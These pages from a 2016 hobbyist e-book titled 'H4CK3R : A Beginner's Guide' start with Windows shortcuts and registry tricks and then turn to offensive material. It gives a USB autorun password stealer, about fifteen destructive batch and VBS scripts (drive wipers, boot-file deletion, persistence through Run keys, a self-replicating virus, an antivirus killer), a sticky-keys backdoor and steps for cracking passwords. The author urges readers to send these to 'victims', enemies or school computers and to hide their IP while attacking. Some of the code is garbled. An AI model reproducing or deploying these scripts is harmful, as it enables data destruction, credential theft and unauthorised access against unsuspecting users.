Command Prompt = cmd
Component Services = dcomcnfg
Computer Management = compmgmt.msc
Date and Time Properties = timedate.cpl
DDE Shares = ddeshare
Device Manager = devmgmt.msc
Direct X Control Panel (If Installed)* = directx.cpl
Direct X Troubleshooter = dxdiag
Disk Cleanup Utility = cleanmgr
Disk Defragment = dfrg.msc
Disk Management = diskmgmt.msc
Disk Partition Manager = diskpart
Display Properties = control desktop/desk.cpl
Dr. Watson System Troubleshooting Utility = drwtsn32
Driver Verifier Utility = verifier
Event Viewer = eventvwr.msc
File Signature Verification Tool = sigverif
Findfast = findfast.cpl
Folders Properties = control folders
Fonts = control fonts
Fonts Folder = fonts
Free Cell Card Game = freecell
Game Controllers = joy.cpl
H4CK3R : A Beginner’s Guide
2016
Page 26
Group Policy Editor (XP Prof) = gpedit.msc
Hearts Card Game = mshearts
Iexpress Wizard = iexpress
Indexing Service = ciadv.msc
Internet Properties = inetcpl.cpl
IP Configuration = ipconfig
Java Control Panel (If Installed) = jpicpl32.cpl
Java Application Cache Viewer (If Installed) = javaws
Keyboard Properties = control keyboard
Local Security Settings = secpol.msc
Local Users and Groups = lusrmgr.msc
Logs You Out Of Windows = logoff
Microsoft Chat = winchat
Minesweeper Game = winmine
Mouse Properties = control mouse
Mouse Properties = main.cpl
Network Connections = control netconnections
Network Connections = ncpa.cpl
Network Setup Wizard = netsetup.cpl
Notepad = notepad
Nview Desktop Manager (If Installed) = nvtuicpl.cpl
Object Packager = packager
ODBC Data Source Administrator = odbccp32.cpl
On Screen Keyboard = osk
Opens AC3 Filter (If Installed) = ac3filter.cpl
Password Properties = password.cpl
Performance Monitor = perfmon.msc
Performance Monitor = perfmon
Phone and Modem Options = telephon.cpl
Power Configuration = powercfg.cpl
Printers and Faxes = control printers
Printers Folder = printers
Private Character Editor = eudcedit
Quicktime (If Installed) = QuickTime.cpl
Regional Settings = intl.cpl
Registry Editor = regedit
Registry Editor = regedit32
Remote Desktop = mstsc
Removable Storage = ntmsmgr.msc
Removable Storage Operator Requests = ntmsoprq.msc
Resultant Set of Policy (XP Prof) = rsop.msc
Scanners and Cameras = sticpl.cpl
Scheduled Tasks = control schedtasks
Security Center = wscui.cpl
Services = services.msc
Shared Folders = fsmgmt.msc
Shuts Down Windows = shutdown
Sounds and Audio = mmsys.cpl
H4CK3R : A Beginner’s Guide
2016
Page 27
Spider Solitare Card Game = spider
SQL Client Configuration = cliconfg
System Configuration Editor = sysedit
System Configuration Utility = msconfig
System File Checker Utility = sfc
System Properties = sysdm.cpl
Task Manager = taskmgr
Telnet Client = telnet
User Account Management = nusrmgr.cpl
Utility Manager = utilman
Windows Firewall = firewall.cpl
Windows Magnifier = magnify
Windows Management Infrastructure = wmimgmt.msc
Windows System Security Tool = syskey
Windows Update Launches = wupdmgr
Windows XP Tour Wizard = tourstart
Wordpad = write
This list is not exhaustive . Most commands will work well, however some of these might
not work on your machine due to version dependencies..
...
H4CK3R : A Beginner’s Guide
2016
Page 28
4. Registry & Group Policy Editor In Windows
In Windows OS Registry is database of operating system where all the settings of
operating system are saved. We can change any setting of system using Registry or
Group Policy Editor.
Hide All Local Drives Using Regisrty
RUN > regedit |or| CMD > regedit
1. Open Registry
2. Hkey_Current_User
3. Software
4. Microsoft
5. Windows
6. Current Version
7. Policies
8. Explorer
Here You Have To Give A New Instruction To The Computer. We Do This Making A
New DWORD
H4CK3R : A Beginner’s Guide
2016
Page 29
1. Right Click On Window
2. New
3. Dword
Now The Name Of This Dword Will Be Same As The Instruction
4. Rename As Nodrives
Now We Have To Start The Instruction. To Do This, We Will Give Enable Value To The
DWord
5. Right Click On Nodrives Dword
6. Modify
7. Insert Enables Value: 3ffffff [Decimal Value - 67108863]
Whenever, You Have To Stop Instruction, You Will Have To Insert Disable Value
Disable Value For Nodrives : 0
Shut Down PC Using Shutdown Virus & Group Policy Editor
RUN > gpedit.msc |or| CMD > gpedit.msc
First We Build A Shutdown Virus :
1. Open Notepad
2. Write Syntax : Shutdown s t 30
3. Save This File As anyname.bat
4. Go To File's Property & Copy Location Of File
Now,
1. Open Group Policy Editor
2. User Configuration
3. Administrative Templates
4. System
5. Log On
6. Run This Program At User Log On
7. Enable
8. Show
9. Paste The Copied Location And Add File Name
10. Done..
11. Restart Computer System.
Now When Ever You Start Your PC It Will Auto ShutDown In 30 Sec..
H4CK3R : A Beginner’s Guide
2016
Page 30
How To Stop Shutdown Process? :
Temporary Solution : When You Start Your PC Type "Shutdown a" In RUN Within 30
Sec. Or It Will Stopped Shutdown Process..
Permanent Solution : Open System In Safe Mode & Remove File From Group Policy
Editor..
...
H4CK3R : A Beginner’s Guide
2016
Page 31
5. Windows Tricks & Hacks
Internet Protection & Privacy :
As We Know That, Sometimes, We Want To Lock Some Websites Due To Security
Reason Or Due To Privacy Of Our Company. There Are Many Websites That Is
Restricted By The Government And We Need To Lock That Site.
In Windows..
1. Go To Syster Drive (C:/)
2. Go To Windows
3. Go To System 32
4. Go To Drivers
5. Go To Etc
6. Now Select Hosts File
7. Open Hosts File On Notepad
8. Write Syntax:
127.0.0.1 www.hostaname.domain
At The Last Of Codes
(ex. 127.0.0.1 www.facebook.com)
7. Save File (CTRL+S)
Now This Site Is Locked & You Can’t Access This Site But If You Want To Allow This
Site (Facebook) To Be Open, Remove That Last Syntax Written To Unlock The Website.
Hide A File Behind An Image
To hide a file behind a image file which means that if any one opens that image he will
see the image only but if you open in a special way then you can open the hidden file
behind the image.
So to hide the file behind a image open CMD.exe
1. Select an image to be used for hiding file behind the image.
2. Now select a file to hide behind the image and make it in .RAR format with the
help of the winrar.
3. & most important is that paste both the files on desktop and run the following
command on the command prompt.
4. & then type the following command.
cd desktop
copy /b imagename.jpg+filename.rar finalnameofimage.jpg
H4CK3R : A Beginner’s Guide
2016
Page 32
And then hit enter the file will be created with the file final file name of the image.
Make A Private Folder
To make private folder which nobody can open, delete, see properties, rename. To make
such a folder you need to make a folder on desktop. Rename it what you want.
And then open command prompt and then type the following command on the screen.
cd desktop
cacls folder /e /p everyone:n
And hit enter the folder is locked
To open the folder just: replace with : f
And the folder is opened..
Done!!!
H4CK3R : A Beginner’s Guide
2016
Page 33
Make A Private Folder With Your Password
First, Open the Notepad & Type the following syntax into the Notepad.
Quote: cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDENTER PASSWORD TO OPEN
:CONFIRM
echo -----------------------------------------------------------
echo ================== THE HACKiNG SAGE ==================
echo -----------------------------------------------------------
echo Are you sure you want to lock the folder(Y/N)
echo Press (Y) for Yes and Press (N) for No.
echo -----------------------------------------------------------
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo -----------------------------------------------------------
echo ================== THE HACKiNG SAGE ==================
echo -----------------------------------------------------------
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== YOUR PASSWORD goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDENTER PASSWORD TO OPEN
md Private
echo Private created successfully
goto End
:End
Now change the password in the if NOT %pass%==YOUR PASSWORD goto
FAIL line replace text of Your Password with your password for the folder lock.
H4CK3R : A Beginner’s Guide
2016
Page 34
Now save this file as Locker.bat and you are done.
Now Open the Locker.bat file and enter your password to open a private folder
of yours.
Now copy paste the files which you want to hide and make it secure in the
private folder.
Now again open the Locker.bat file and press 'Y' to lock the private folder with
your password.
Now to again open the secured files open the locker.bat file Enter your
password and your files are there for you.
NOTE : You can use bat to exe converter and can convert it into .exe file to safeguard
the code above.
Hack Passwords Using Pendrive (USB Stealer)
We all know, Windows stores most of the passwords which are used on a daily basis,
including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger
etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP,
FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There
exists many tools for recovering these passswords from their stored places. Using these
tools and a USB pen-drive, you can create your own rootkit to steal passwords from any
computer. You need to follow these steps to make your own password stealing rootkits.
You must temporarily disable the antivirus before following these steps.
1. Download the set of tools, extract them and copy all files (.exe) into your USB
Pendrive.
Download Password Stealer From Here :
http://www86.zippyshare.com/v/Dy3oseUc/file.html
2. Create a new Notepad and write the following text into it.
[autorun] open=launch.bat
ACTION= Perform a Virus Scan
3. Save the Notepad and rename it from New Text Document.txt to autorun.inf
4. Copy the autorun.inf file onto your USB pen-drive.
5. Create another Notepad and write the following text in it.
start mspass.exe /stext mspass.txtstart mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
Save the Notepad and rename it from New Text Document.txt to launch.bat. Copy the
launch.bat file to your USB drive.
H4CK3R : A Beginner’s Guide
2016
Page 35
Now our rootkit is ready and we are all set to sniff the passwords. You can use this pen-
drive on on any computer to steal the stored passwords.
Now, Insert the pen-drive and the auto-run window will pop-up. (This is because, we
have created an auto-run pen-drive). In the pop-up window, select the first option
(Perform a Virus Scan). Now all the password recovery tools will silently get executed
in the background (This process takes hardly a few seconds). The passwords get stored
in the .TXT files. Remove the pen-drive and you’ll see the stored passwords in the .TXT
files and Use The Passwords..
Create Dangerous Virus Using Notepad
In this article we will learn how to create simple but dangerous viruses using notepad.
These are very simple to create and use, but don’t dare to use these on your computer
because these viruses can destroy your personal information. Where to use? You can
send these viruses to your enemies or if you wanna try it yourself best and my favorite
place is school computers.
Let’s get started..
1. Open notepad ( run > notepad )
2. Put the syntax provided
3. Save it in the correct extension.. for this replace .txt correct extension like
.bat/.vbs
4. Done !!!
1. RAM Crash Virus :
:thehackingsage
explorer.exe
goto thehackingsage
Save File As ramcrash.bat
2. Wiper :
Deletes everything in the computer’s drive.
@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q
Save As wiper.bat
3. Registry Deleter :
H4CK3R : A Beginner’s Guide
2016
Page 36
Deletes everything stored in registry.
@echo off
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
Save As registrydeleter.bat
4. No Access :
A good Halloween prank for your friends this stops internet access of the user.
@echo off
ipconfig /release
Save As noaccess.bat
To gain Access type IPconfig /renew in CMD
5. Shut Up :
Send your friend a little message and shut down his computer
@echo off
msg * Lets Roll Baby
shutdown -c “Error! Your ass got glued!” –s
Save As shutup.bat
6. Crash Puter :
This is simple virus that crashes the computer
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next
Save As crashputer.vbs
7. Ez Formatter :
This Simple Virus formats windows drives in less than 5 seconds. Only D,E And C
drives.
H4CK3R : A Beginner’s Guide
2016
Page 37
rd/s/q D:\
rd/s/q C:\
rd/s/q E:\
Save As ezformatter.bat
8. Shutter :
This virus can be very annoying it shutdowns computer every time the computer is
turned on.
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v
startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t
reg_sz /d c:windowshartlell.bat /f
echo You Are Nailed, Buy A New Computer This Is Piece Of Shit.
PAUSE
Save As shutter.bat
9. Rest In Peace :
It crashes PC once used the PC can’t be restarted.. It deletes everything necessary for
starting up windows.
Do not use on yourself .
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Save As RIP.bat
10. Century :
Shut downs the PC hundred times. You can also change the times pc restarts by
replacing 100 by your choice.
shutdown -s -t 100 c “Installing Updates”
Save As shutdowncentury.bat
H4CK3R : A Beginner’s Guide
2016
Page 38
To Stop type shutdown -a in Run
11. RIP v2.0 :
This virus does the same It also prevents pc from starting but in an effective and better
way.
del c:\WINDOWS\system32\*.*/q
Save As RIP2.bat
12. Freak :
This virus disables the internet forever
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v
WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v
CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You have maxed your internet usage for a lifetime
PAUSE
Save As freak.bat
13. CMD Matrix :
Don’t think i am telling you about simple matrix falling effect of notepad. When you run
it, it makes matrix out of the batch file. Don’t run it on your pc
// THE HACKiNG SAGE
// http://www.thehackingsagerises.blogspot.com
#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
H4CK3R : A Beginner’s Guide
2016
Page 39
char inputFile[]=”C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\rawr.bat”;
ifstream input(inputFile);
if (!input)
{
{
ofstream fp(“C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\rawr.bat”, ios::app);
fp << “@ECHO OFF n”;
fp << “START C:\rawr.exe n”;
fp << “EXIT”;
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}
{
char buffer[255];
char inputFile[]=”C:\rawr.exe”;
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp(“CLICK.bat”, ios::app);
fp << “@ECHO OFF n”;
fp << “COPY matrix.exe C:\rawr.exe n”;
fp << “START C:\rawr.exe n”;
fp << “EXIT”;
}
system(“START CLICK.bat”);
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system(“call shutdown.exe -S”);
goto START;
}
}
}
START:{
for(int i = 0; i < 1; i++)
{
H4CK3R : A Beginner’s Guide
2016
Page 40
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN |
FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << “0%”;
cout << setw(4) << “P”;
cout << setw(4) << ” “;
cout << setw(4) << “)”;
cout << setw(4) << “#”;
cout << setw(4) << “X”;
cout << setw(4) << “@”;
cout << setw(4) << “1&”;
cout << setw(4) << “*”;
cout << setw(4) << “||”;
cout << setw(4) << ” “;
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;
Save As cmdmatrix.bat
14. Danger X
I ain’t gonna tell anything about this one find it yourself.. Don’t test it on your PC.
@echo off>nul.ViRuS
if ?%1==?/ViRuS_MULTIPLY goto ViRuS_multiply
if ?%1==?/ViRuS_OUTER_LOOP goto ViRuS_outer_loop
if ?%1==?/ViRuS_FINDSELF goto ViRuS_findself
if ?%VOFF%==?T goto ViRuS_OLDBAT
set ViRuSname=%0
if not exist %0.bat call %0 /ViRuS_FINDSELF %path%
if not exist %ViRuSname%.bat set ViRuSname=
if ?%ViRuSname%==? goto ViRuS_OLDBAT
rem ViRuS if batch is started with name.BAT, virus will not become active
rem ViRuS it was a bug, now it?s a feature ! (also notice the voff variable)
rem ViRuS also if batch was only in an append /xn path (chance=minimal)
attrib +h %ViRuSname%.bat
for %%a in (%path%;.) do call %0 /ViRuS_OUTER_LOOP %%a
attrib -h %ViRuSname%.bat
set ViRuSname=
goto ViRuS_OLDBAT
:ViRuS_findself
if ?%2==? goto XXX_END>nul.ViRuS
if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname%
H4CK3R : A Beginner’s Guide
2016
Page 41
if exist %ViRuSname%.bat goto XXX_END
if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
shift>nul.ViRuS
goto ViRuS_findself
:ViRuS_outer_loop
for %%a in (%2*.bat;%2*.bat) do call %0 /ViRuS_MULTIPLY %%a
goto XXX_END>nul.ViRuS
:ViRuS_multiply
find ?ViRuS? <%ViRuSname%.bat >xViRuSx.bat
find /v ?ViRuS? <%2 |find /v ?:XXX_END? >>xViRuSx.bat
echo :XXX_END>>xViRuSx.bat
copy xViRuSx.bat %2>nul
del xViRuSx.bat
goto XXX_END>nul.ViRuS
:ViRuS_OLDBAT
echo on>nul.ViRuS
echo Exclusive THE HACKiNG SAGE
:XXX_END
Save As dangerX.bat
15. Antivirus Ripper :
You can guess what it does by its name .
@ echo off
rem
rem RIP Anti Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
H4CK3R : A Beginner’s Guide
2016
Page 42
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
H4CK3R : A Beginner’s Guide
2016
Page 43
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files
ood32krn\*.exe
del /Q /F C:\Program Files
ood32\*.exe
cls
del /Q /F C:\Program Files
od32
del /Q /F C:\Program Files
ood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem
H4CK3R : A Beginner’s Guide
2016
Page 44
Save As antivirusripper.bat
This is not compatible with every single antivirus but with famous antivirus.
Done !!!!
WARNING : This Is Only for Educational Purpose, Please Don’t Miseuse..
Now, there are some smart guys who check the batch files in notepad before running it.
No big deal. An effective way .
How to make those stuff work ? Well... Download bat to exe Converter :
http://www100.zippyshare.com/v/RsogwyWd/file.html
1. Download and run the converter.
2. Inject your batch file
3. Choose icon
4. Version and information
5. Compile
6. Send to your victim..
WARNING : All These Batch File Viruses Are So Dangerous So Please Don’t
Misuse..
.....
H4CK3R : A Beginner’s Guide
2016
Page 45
6. Change & Hide IP Address
How To Hide IP Address?
Method 1 :
In Windows,
1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "cmd" and hit Enter.
4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "Properties”.
You should now be on a screen with something titled "Local Area Connection",
or something close to that, and, if you have a network hooked up, all of your
other networks.
8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General"
tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill
the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with
default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again
You should now be back to the "Local Area Connection" screen.
15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically" tongue.gif
18. Hit "Ok"
H4CK3R : A Beginner’s Guide
2016
Page 46
19. Hit "Ok" again
20. You now have a new IP address
With a little practice, you can easily get this process down to 15 seconds.
“This only changes your dynamic IP address, not your ISP/IP address. If you plan on
hacking a website with this trick be extremely careful, because if they try a little, they
can trace it back.”
Method 2 :
Hiding the IP address is one of the biggest concerns of all Hackers as the IP Address can
reveal the identity if the Hacker. Its just like your online address. If anyone can find
your actual online address (IP Address), tracing you back won’t be that difficult. Thus it
is very important to hide or change your IP address before doing any kind of hacking
attack or even think of doing so. After getting hundreds of request on a tutorial on how
to hide your IP address, here I am writing a detailed step by step tutorial on how to hide
or change ip address.
We are using the proxy service called Hide My Ass (Pro VPN).
What’s that? Let me explain in detail. We all know about proxy servers. They help us to
hide your ip address or change ip address but there are many things you guys don’t
know.
1. Free proxies are not completely anonymous Your up can be disclosed by the
website owner to the concerned authorities if needed.
2. Companies limit the maximum speed of browsing in free proxies Say your
internet speed is 8 Mbps, still using free proxies you can browse internet with a
speed of only 265 kbps. This is irritating, isn’t it.
3. Many Webmasters can block users accessing free proxies.
Even I wanted a reliable and Elite Proxy which can help me completely hide my Online
Identity and what else could be better than changing my IP address every minute. I
looked for many solutions online and then I found the PRO VPN of Hide My Ass.
To be very honest, in the beginning I was a bit confused when I saw the software. I was
not very sure if it would work the way I wanted to but then I gave it a try. I thought of
jiving it a try just for 1 month. It was just for $11.52 then , not it costs $9.99 only. I
could actually think of spending $11.52 for my only if it gave me the kind on anonymity
I wanted on internet. It helped me secure my online IdentityOnline.
Here are benefits I got after using the PRO VPN of Hide My Ass.
1. Super fast, high speed elite / anonymous proxies. Elite proxies are 100 times
more secure than free proxies
H4CK3R : A Beginner’s Guide
2016
Page 47
2. I could select the country whose IP address I wanted in just 1 click. It offers over
38000+ unique IP Address from 53 different countries.
3. I can set the timer to automatically change the IP Address. This way my IP
Address gets changed every minute without me bothering to do so. If I am
implementing a hacking attack, no-one could actually find my actual IP Address
so I am always on the safer side.
4. It anonymously encrypts all the traffic and works with all kind of platforms.
Unlike free proxies the PRO VPN of Hide My Ass is not blocked by the websites.
The traffic seems to be of legitimate human users, not proxies so on one can catch
you using them.
Once you enter the Software Dashboard, you get the interface shown.
We can select the IP Address of the country we want. There are 53+ countries and
38,000+ IP Address to chose from We also get the provision to set the IP timeout ie we
can select the time after which each IP Address should change and we get a new IP
Address. It is a simple one click setting. Now that you guys have everything infront you
you, you can imaging how easy it is to change the IP Address automatically using
the Hide My Ass Pro VPN. This surely is the best proxy service out there. I was so
overwhelmed by its response that I decided to write a detailed review about its
performance. If you are still in doubt just go and give it a try.
It surely is worth it. I am sure you can spend $9.99 for your online security. It can
actually have you from $$$$ loss and at the same time secure your online identity by
making you anonymous.
Hide My Ass : www.hidemyass.com
There are many other benefits of using this service. This post has already become too
long so will not stretch it more, maybe i will soon write another blog post for you guys
describing how this best proxy service can help you from getting hacked and increase
your online security by continuously changing your ip address.
How To Change IP Address?
IP address is an address that shows your location while you are using internet..
Therefore you must change your IP address to change your actual location when you are
performing any activity related to hacking..
A software multyproxy is used to change the location IP address of system.
How To Use ?
1. Open Multyproxy
2. Option
3. Proxy Server List
4. Menu
5. Add
6. Done !!! (click cancel to Minimize..)
Download Multiproxy : http://www32.zippyshare.com/v/23skLare/file.html
...
H4CK3R : A Beginner’s Guide
2016
Page 48
7. Change MAC Address?
MAC (Media Access Control) is an address in computer system that shows the physical
address of system. This address is same as IMEI no. of mobile phone. You must change
this address to hide your real Identity.
A software TMAC is used to change MAC address of system..
How To Use?
1. Open TMAC
2. Random MAC Address
3. Changes (Click on Restore Original to set original MAC Address..)
...
H4CK3R : A Beginner’s Guide
2016
Page 49
8. System Password Cracking
Windows
Change Windows System Password Without Using Current Password :
As We Know That We Need Current Password To Change The System Password But
There Is A Trick To Change The System Password With Out Using Current Password.
Just Follow The Simple Steps :
1. Right Click On Computer
2. Manage [ Run > compmgmt.msc ]
3. Local User And Group
4. User
5. Right Click On Target User
6. Set Password
7. Proceed
8. Enter New Password..
9. Done..
Crack Windows System Log In Password :
You can trace the password of any computer system using OPH Crack..
Its A Linux Besed Live OS.. OPH Crack Works On The Concept Of Brute Force
Attack. It Makes All The Combination Of Keys From You Keyboard And Matches To
SAM File Where Password Of Windows Is Saved. It Matches 7 Lakh Passwords In A
Second..
How To Use OPHCrack?
Simply download the Ophcrack ISO and burn it to a CD (or load it onto a USB drive via
UNetbootin). Insert the CD into a machine you would like to gain access to, then press
and hold the power button until the computer shuts down. Turn the computer back on
and enter BIOS at startup. Change the boot sequence to CD before HDD, then save and
exit.
The computer will restart and Ophcrack will be loaded. Sit back and watch as it does all
the work for your. Write down the password it gives you, remove the disc, restart the
computer, and log in as if it were you own machine.
Download OPH Crack : http://ophcrack.sourceforge.net
H4CK3R : A Beginner’s Guide
2016
Page 50
Linux
Linux is an operating system which is quickly gaining popularity in mainstream, but
not so common that you’re likely to come across it. Though Mac and Linux are both
based on UNIX, it is easier to change the password in Linux than it is OS X.
To change the password, turn on the computer and press the ESC key when GRUB
appears. Scroll down and highlight
‘Recovery Mode’ and press the ‘B’ key; this will cause you to enter ‘Single User Mode’.
You’re now at the prompt, and logged in as ‘root’ by default. Type ‘passwd’ and then
choose a new password. This will change the root password to whatever you enter. If
you’re interested in only gaining access to a single account on the system, however, then
type ‘passwd username’ replacing ‘username’ with the login name for the account you
would like to alter the password for.
MAC
Finally we take on Mac’s OS X which as we said earlier is based on UNIX and is difficult
to change password compared to Linux but nothing is impossible to be hacked.
The easiest method would be to use Ophcrack on this also as it works with Mac and
Linux in addition to Windows. However, there are other methods that can be used, as
demonstrated below.
If the Mac runs OS X 10.4, then you only need the installation CD. Insert it into the
computer, reboot. When it starts up, select UTILITIES > RESET PASSWORD. Choose a
new password and then use that to log in. If the Mac runs OS X 10.5, restart the
computer and press COMMAND + S. When at the prompt, type :
fsck -fy
mount -uw /
launchctl load
/System/Library/LaunchDaemons/com.apple.DirectoryServices.plist
dscl . -passwd /Users/UserName newpassword
...
H4CK3R : A Beginner’s Guide
2016
Page 51
9. Backdoor
Backdoor Means A Hidden Way To Enter In Any System. We Make A Backdoor To Be
Able To Open The System Of Anyone At Anytime.
But We Must Get The Target System Logged In As Administrator Once When We Have
To Make Backdoor.
(System Is Locked ??? Read Previous Article 9. Password Cracking)
Now Just Follow These Simple Steps To Creating Backdoor On Windows :
1. Open Computer > System Drive (C:/) > Windows > System32
2. Copy CMD
3. Paste On Desktop
4. Rename As Sethc
5. Cut This Renamed File
6. Paste Into System32
7. Move And Replace
8. Done !!!
Now Whenever You Press Shift As 5 Times, Cmd Will Be Open.. This Function Is Also
Worked On Logged On Screen.. Now When You Are At System Log Is Screen Press Shift
5 Times.
Booom !!!!! CMD Will Be Opened..
Now Create A New User Account, Make User As Admin, Then Log On As New User
Account (Admin).. This Trick Helps You To Access Any System Making New User And
You Can Delete It After Work :
Command To Make New User : net user username /add
Command To Make User As Administrator : net localgroup administrators username /add
Command To Delete The User : net user username /del
...
H4CK3R : A Beginner’s Guide
2016
Page 52
10. Software Hacking
As We Know That We Use Much Software To Accomplish Our Task Or Application.
These Types Of Software Are Known As Application Software.
We Have To Purchase The Software To Use It Otherwise We Can Download It From
Internet We Can Use This Downloaded Software Till 30 Day Or 15 Days Because The
Software Would Be Trial Version.
A Software Time Stopper Is Used To Break This Limitation Of Software And We Can
